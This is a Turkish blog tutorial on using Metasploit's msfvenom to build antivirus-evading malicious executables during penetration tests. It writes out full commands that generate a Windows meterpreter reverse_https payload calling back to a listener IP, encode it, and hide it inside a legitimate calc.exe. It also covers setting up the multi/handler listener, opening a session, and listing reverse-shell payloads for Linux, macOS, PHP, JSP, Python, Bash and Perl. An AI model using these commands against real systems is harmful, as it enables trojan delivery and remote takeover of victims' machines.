Msfvenom Aracı Kullanarak Zararlı Yazılım Oluşturma

0
118
views
Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfvenom aracı kullanılarak antivirüslere yakalanmayan zararlı uygulamalar oluşturulacaktır.

Msfvenom; MsfPayload ve MsfEncode modüllerinin birleşimidir. Günümüzde bu modüller için destek kaldırılmış olup, bu modüller yerine Msfvenom kullanılması tavsiye edilmektedir. Msfvenom ile ilgili ayrıntılı bilgi için “-h” seçeneği kullanılabilir.

metasploit -h

evading-anti-virus-detection-using-msfvenom-tool-01

Msfvenom ile zararlı bir exe oluşturulması için örnek bir komut aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -e x86/shikata_ga_nai -f exe -i 5 -b ‘x00’ > /root/Desktop/ZararliUygulama.exe

evading-anti-virus-detection-using-msfvenom-tool-02

 

Not: Örnek bir kullanım da aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -a x86 –platform windows -f raw -e x86/countdown -i 5 | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -i 5 -b ‘x00’ -f exe -x yasalUygulama_calc.exe -o /root/Desktop/ZararliUygulama.exe

 

Yukarıdaki komut kullanılarak Payload olarak “windows/meterpreter/reverse_https“, Encoder olarak da “x86/shikata_ga_nai ” kullanılmıştır. Encoder ve Payload kavramları hakkında ek bilgi için bakınız.

Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.0.130
msf exploit(handler) > set LPORT 443
msf exploit(handler) > show options

evading-anti-virus-detection-using-msfvenom-tool-03

Exploit işlemi başlatılır ve exe uygulamasının tıklanması için beklenilir.

exploit -j

evading-anti-virus-detection-using-msfvenom-tool-04

Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.

sessions -l
sessions -i 1
getuid

evading-anti-virus-detection-using-msfvenom-tool-05

Hazırlanan zararlı uygulamanın, günümüzde bir çok antivirüs tarafından yakalandığı görülmektedir. Virüs.mu tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir:

evading-anti-virus-detection-using-msfvenom-tool-06

Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 38 tanesi tarafından yakalandığı görülmektedir.

evading-anti-virus-detection-using-msfvenom-tool-07

 

Msfvenom ile en çok kullanılan payload’lar ve formatları aşağıdaki gibi listelenebilir.

  • Linux Payload (-p): linux/x86/meterpreter/reverse_tcp
    Linux Format (-f): elf
  • Windows Payload (-p): windows/meterpreter/reverse_tcp
    Windows Format (-f): exe
  • MAC Payload (-p): osx/x86/shell_reverse_tcp
    MAC Format (-f): macho
  • PHP Payload (-p): php/meterpreter_reverse_tcp
    PHP Format (-f): php
  • ASP Payload (-p): windows/meterpreter/reverse_tcp
    ASP Format (-f): asp
  • JSP Payload (-p): java/jsp_shell_reverse_tcp
    JSP Format (-f): raw
  • WAR Payload (-p): java/jsp_shell_reverse_tcp
    WAR Format (-f): war
  • Python Payload (-p): cmd/unix/reverse_python
    Python Format (-f): raw
  • Bash Payload (-p): cmd/unix/reverse_bash
    Bash Format (-f): raw
  • Perl Payload (-p): cmd/unix/reverse_perl
    Perl Format (-f): raw

 

 

Kaynaklar:

http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

Create Exploit Using Msfvenom to Hack Windows 7 SP1


http://www.kursatoguzhanakinci.com/2015/07/msfvenom-kullanm-detayl.html

Msfvenom Cheat Sheet


https://netsec.ws/?p=331

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz